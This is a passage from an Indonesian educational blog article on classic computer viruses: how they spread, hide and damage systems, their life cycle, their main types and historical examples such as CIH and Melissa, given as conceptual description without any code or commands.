c. Virus jenis ini lain cara penyebarannya / penularannya, mekanisme penularan dari virus ini adalah dia membuat file dengan nama yang sama dengan file korbannya, tetapi dengan akhiran .COM. karena sisitem komputer MS-DOS mempunyai sistem, yang apabila ada dua nama file yang sama, tetapi extensinya berbeda, yaitu .EXE dan .COM, maka file .COM dahulu yang akan dijalankan, maka dari itu virus ini membuat file dengan nana yang sama dengan korbannya., mekanismenya..
Kemampuan mengadakan manipulasi
Rutin (routine) yang dimiliki suatu virus akan dijalankan setelah virus menulari suatu file. Isi dari suatu rutin ini dapat beragam mulai dari yang tidak berbahaya sampai yang melakukan perusakan. Rutin ini umumnya digunakan untuk memanipulasi file atau pun mempopulerkan pembuatnya ! Rutin ini memanfaatkan kemampuan dari suatu sistem operasi (Operating System), sehingga memiliki kemampuan yang sama dengan yang dimiliki sistem operasi. Misal : a. Membuat gambar atau pesan pada monitor b. Mengganti/mengubah-ubah label dari tiap file, direktori, atau label dari drive di PC c. Memanipulasi file yang ditulari d. Merusak file e. Mengacaukan kerja printer, dsb
Kemampuan Menyembunyikan diri
Kemampuan menyembunyikan diri ini harus dimiliki oleh suatu virus agar semua pekerjaan baik dari awal sampai berhasilnya penularan dapat terlaksana. Langkah langkah yang biasa dilakukan adalah: Program virus disimpan dalam bentuk kode mesin dan digabung dengan program lain yang dianggap berguna oleh pemakai – Program virus diletakkan pada Boot Record atau track pada disk yang jarang diperhatikan oleh komputer itu sendiri – Program virus dibuat sependek mungkin, dan hasil file yang diinfeksi tidak terlalu berubah ukurannya – Virus tidak mengubah keterangan/informasi waktu suatu file – dll
SIKLUS HIDUP VIRUS Siklus hidup virus secara umum, melalui 4 tahap: 1. Dormant phase ( Fase Istirahat/Tidur ) Pada fase ini virus tidaklah aktif. Virus akan diaktifkan oleh suatu kondisi tertentu, semisal: tanggal yang ditentukan, kehadiran program lain/dieksekusinya program lain, dsb. Tidak semua virus melalui fase ini. 2. Propagation phase ( Fase Penyebaran ) Pada fase ini virus akan mengkopikan dirinya kepada suatu program atau ke suatu tempat dari media storage (baik hardisk, RAM dsb). Setiap program yang terinfeksi akan menjadi hasil “kloning” virus tersebut (tergantung cara virus tersebut menginfeksinya). 3. Trigerring phase ( Fase Aktif ) Di fase ini virus tersebut akan aktif dan hal ini juga di picu oleh beberapa kondisi seperti pada Dormant Phase. 4. Execution phase ( Fase Eksekusi ) Pada fase inilah virus yang telah aktif tadi akan melakukan fungsinya. Seperti menghapus file, menampilkan pesan-pesan, dsb JENIS – JENIS VIRUS Untuk lebih mempertajam pengetahuan kita tentang virus, saya akan coba memberikan penjelasan tentang jenis-jenis virus yang sering berkeliaran di masyarakat umum.
1. Virus Makro
Jenis virus ini pasti sudah sangat sering kita dengar. Virus ini ditulis dengan bahasa pemrograman dari suatu aplikasi bukan dengan bahasa pemrograman dari suatu Operating System. Virus ini dapat berjalan apabila aplikasi pembentuknya dapat berjalan dengan baik. Sebagai contoh jika pada komputer mac dijalankan aplikasi Word, maka virus makro yang dibuat dari bahasa makro Word dapat bekerja pada komputer bersistem operasi Mac ini. Contoh virus: – Varian W97M, misal W97M.Panther Panjang 1234 bytes, akanmenginfeksi NORMAL.DOT dan menginfeksi dokumen apabila dibuka. – WM.Twno.A;TW Panjang 41984 bytes, akan menginfeksi Dokumen Ms.Word yang menggunakan bahasa makro, biasanya berekstensi *.DOT dan *.DOC – dll
2. Virus Boot Sector
Virus Boot sector ini sudah umum sekali menyebar. Virus ini dalam menggandakan dirinya, akan memindahkan atau menggantikan boot sector asli dengan program booting virus. Sehingga saat terjadi booting maka virus akan diload ke memori dan selanjutnya virus akan mempunyai kemampuan mengendalikan hardware standar (contoh : monitor, printer dsb) dan dari memori ini pula virus akan menyebar ke seluruh drive yang ada dan yang terhubung ke komputer (contoh : floopy, drive lain selain drive c:). Pekerjaan pokok yang harus dilakukan virus boot sector secara umum mencakup 3 hal yaitu :
1. Virus harus menyimpan bootsector atau partisi asli ke suatu tempat pada disket atau hardisk dan mengganti data-data pada boot sector dengan program virus itu sendiri, yang kemudian setelah virus boot sector itu dijalankan baru dia akan memanggil data-data boot sector asli atau data-data system.
2. Virus harus tinggal dimemory setelah system berjalan dan akan memperbanyak dirinya pada setiap kondisi tertentu, kondisi ini biasanya kalau ada proses baca atau tulis pada disket
3. Virus umumnya mempunyai Routine / tugas khusus yang disertakan oleh pembuatnya seperti menampilkan kata-kata, gambar atau juga logic Bom seperti melakukan pemformatan terhadap Hard Disk pada tanggal tertentu dan lain sebagainya.
Contoh virus : – Varian virus wyx ex: wyx.C(B) menginfeksi boot record dan floopy ; Panjang :520 bytes; Karakteristik memory resident dan terenkripsi. – Varian V – Sign : Menginfeksi : Master Boot Record ; Panjang 520 bytes; Karakteristik : menetap di memori (memory resident),terenkripsi, dan polymorphic) – Stoned.june 4th/ bloody!: Menginfeksi : Master Boot Record dan floopy; Panjang 520 bytes; Karakteristik : menetap di memori (memory resident), terenkripsi dan menampilkan pesan “Bloody!june 4th 1989″ setelah komputer melakukan booting sebanyak 128 kali.
3. Stealth Virus
Virus ini akan menguasai tabel interrupt pada DOS yang sering kita kenal dengan “Interrupt interceptor”. Virus ini berkemampuan untuk mengendalikan instruksi-instruksi level DOS dan biasanya mereka tersembunyi sesuai namanya baik secara penuh ataupun ukurannya. Contoh virus : – Yankee.XPEH.4928, Menginfeksi file *.COM dan *.EXE ; Panjang 4298 bytes; Karakteristik: menetap di memori, ukurantersembunyi, memiliki pemicu – WXYC (yang termasuk kategori boot record pun karena masuk kategri stealth dimasukkan pula disini), Menginfeksi floopy an motherboot record; Panjang 520 bytes; Karakteristik : menetap di memori; ukuran dan virus tersembunyi. – Vmem(s): Menginfeksi file file *.EXE, *.SYS, dan *.COM ; Panjang fie 3275 bytes; Karakteristik:menetap di memori, ukuran tersembunyi, di enkripsi. – dll
4. Polymorphic Virus
Virus ini Dirancang buat mengecoh program antivirus, artinya virus ini selalu berusaha agar tidak dikenali oleh antivirus dengan cara selalu merubah rubah strukturnya setiap kali selesai menginfeksi file/program lain. Contoh virus: – Necropolis A/B, Menginfeksi file *.EXE dan *.COM; Panjang file 1963 bytes; Karakteristik: menetap di memori, ukuran dan virus tesembunyi,terenkripsi dan dapat berubah ubah struktur – Nightfall, Menginfeksi file *.EXE; Panjang file 4554 bytes; Karakteristik : menetap di memori, ukuran dan virus tesembunyi,memiliki pemicu, terenkripsidan dapat berubah-ubah struktur – dll
5. Virus File/Program
Virus ini menginfeksi file-file yang dapat dieksekusi langsung dari sistem operasi, baik itu file *.EXE, maupun *.COM biasanya juga hasil infeksi dari virus ini dapat diketahui dengan berubahnya ukuran file yang diserangnya. Virus Komputer ini juga dapat menyerang file Documen dalam Windows dengan extensi DOC, selain itu virus-virus file baru banyak yang diprogram dibawah sistem operasi windows, dan sudah tidak menggunakan Low Level Language (Assembly) , melainkan dengan High Level Language (HLL). Virus Komputer ini biasa dirtulis dengan Visual Basic, Java Script, VB Script, Visual C++ dan lain sebagainya. Biasanya virus yang diprogram dengan HLL ini dapat disebarkan melalui Internet dalam bentuk E-mail Attachment , Virus Komputer jenis ini lebih luas dan lebih cepat perkembangannya di banding kan virus file yang beroperasi dalam lingkungan DOS
6. Multi Partition Virus
Virus ini merupakan gabungan dari virus boot sector dan virus file. Artinya pekerjaan yang dilakukan berakibat dua, yaitu dia dapat menginfeksi file-file *.EXE atau *.COM dan juga menginfeksi boot sector. Menurut Rutin Aktivasi Berdasarkan rutin-rutinnya Virus Komputer dapat dibedakan menjadi 3 kelompok besar, yang dimasukan kedalam kategori tingkat bahaya / keganasan dari virus yaitu virus jinak, ganas, dan virus destruktif, yang didalamnya masing-masing dibagi lagi menjadi beberapa bagian yaitu :
1. Virus Jinak
Virus dengan rutin / tugas yang dibebankan kepadannya tidak melakuan aksi-aksi destruktif , maka akan disebut virus junak, biasannya virus jenis ini melakukan hal-hal seperti dibawah ini
1. Rutin untuk menampilkan gambar atau tulisan kelayar
2. Rutin untuk membunyikan port untuk speaker dengan nada-nada tertentu, seperti irama lagu ( Virus Mozzart ), tembakan ( VCL Based Virus ).
3. Rutin untuk mempause / menghentikan komputer setelah beberapa jam komputer yang terinfeksi dipakai.Contohnya Virus Ambulance
4. Rutin untuk mengurangi ram , sehingga komputer berjalan lebih lambat, yaitu walaupun memakai Prosesor P.II 233 Mhz akan seperti Proc. 486
5. Rutin untuk merestart komputer pada waktu-waktu tertentu ( NRLG Based Virus )
6. Rutin untuk mengacaukan keyboard, seperti mengacaukan letak huruf pada keyboard (Virus KeyPress ), atau memindahkan susunan tombol kyboard 1 tombol disebelahnya ( Virus Typo COM
2. Virus Ganas
Yang termasuk dari jenis virus ini adalah virus-virus yang mempunyai aksi-aksi yang merugikan, dan biasanya kerugian yang diakibatkan oleh jenis virus ini tidak dapat dipulihkan.Yang termasuk rutin / aksi yang merugikan atau berbahaya dari virus ini adalah:
1. Rutin untuk menghapus file, atau seluruh file dalam disket maka data pada disket tersebut akan hilang, contoh dari virus ini BLODY Virus.
2. Rutin untuk memformat hard disk, maka otomatis data yang ada pada hard disk juga akan ikut hilang, contoh dari virus ini adalah virus AIDS II
3. Overwriting file target, rutin ini akan merusak program yang ditulari, sehingga program tidak dapat dipakai lagi, sebagai contoh dari virus ini adalah VOOTIE.B.66 virus, yang akan mengoverwrite permulaan file targetnya sebanyak panjang badan virus, yaitu 66 Bytes.
4. Rutin untuk Mengacaukan kerja primnter, yang akan merusak dokumen yang akan dicetak atau diprint, contohnya virus SUPERNOVA.
5. Rutin untuk membebani Server atau attachment E-Mail, rutin ini biasanya digunakan oleh virus yang bekerja dibawah file operasi Windows , atau unix , sebagai contoh virus Melissa, virus Prilissa.
3. Virus Destruktif
Virus Komputer jenis destruktif Ini yang biasanya paling ditakuti orang, karena daya rusaknya yang besar dan juga dapat menghancurkan sofware maupun hard ware, sehingga kerugian yang diakibatkan oleh Virus Komputer jenis ini sangat besar, karena mereka banyak melakukan perusakan terhadap hardware, contoh rutin yang termasuk kategori destruktif antara lain:
1. Rutin penghancuran FAT dan atau Directory pada hard disk , dengan cara melakukan pemformatan pada track 2, sector 0, sampai track 3 sector 1 pada side 0 sehingga harddisk tidak akan bisa dipakai, atau membuat Bad Sector Pada side 0, tarck 0, sector 0 ( Pada boot record ), sehingga harddisk tidak dapat diformat. Contoh dari virus ini adalah DEVIL DANCE Virus.
2. Rutin menghancurkan BIOS, sehingga komputer tidak mengenali lagi peripherial yang dipasang pada komputer tersebut, sehingga akan merusak hard disk, Main board, contoh virus ini adalah virus CIH yang dibuat oleh Cheng Ing Hau
BEBERAPA CARA PENYEBARAN VIRUS Virus layaknya virus biologi harus memiliki media untuk dapat menyebar, virus komputer dapat menyebar ke berbagai komputer/mesin lainnya juga melalui berbagai media, diantaranya:
1. Disket, media storage R/W Media penyimpanan eksternal dapat menjadi sasaran empuk bagi virus untuk dijadikan media. Baik sebagai tempat menetap ataupun sebagai media penyebarannya. Media yang bisa melakukan operasi R/W (Read dan Write) sangat memungkinkan untuk ditumpangi virus dan dijadikan sebagai media penyebaran.
2. Jaringan ( LAN, WAN,dsb) Hubungan antara beberapa computer secara langsung sangat memungkinkan suatu virus ikut berpindah saat terjadi pertukaran/pengeksekusian file yang mengandung virus.
  sumber : http://anggabhandel009.blogspot.com
 
Klik689 © 2011 Templates | Nanda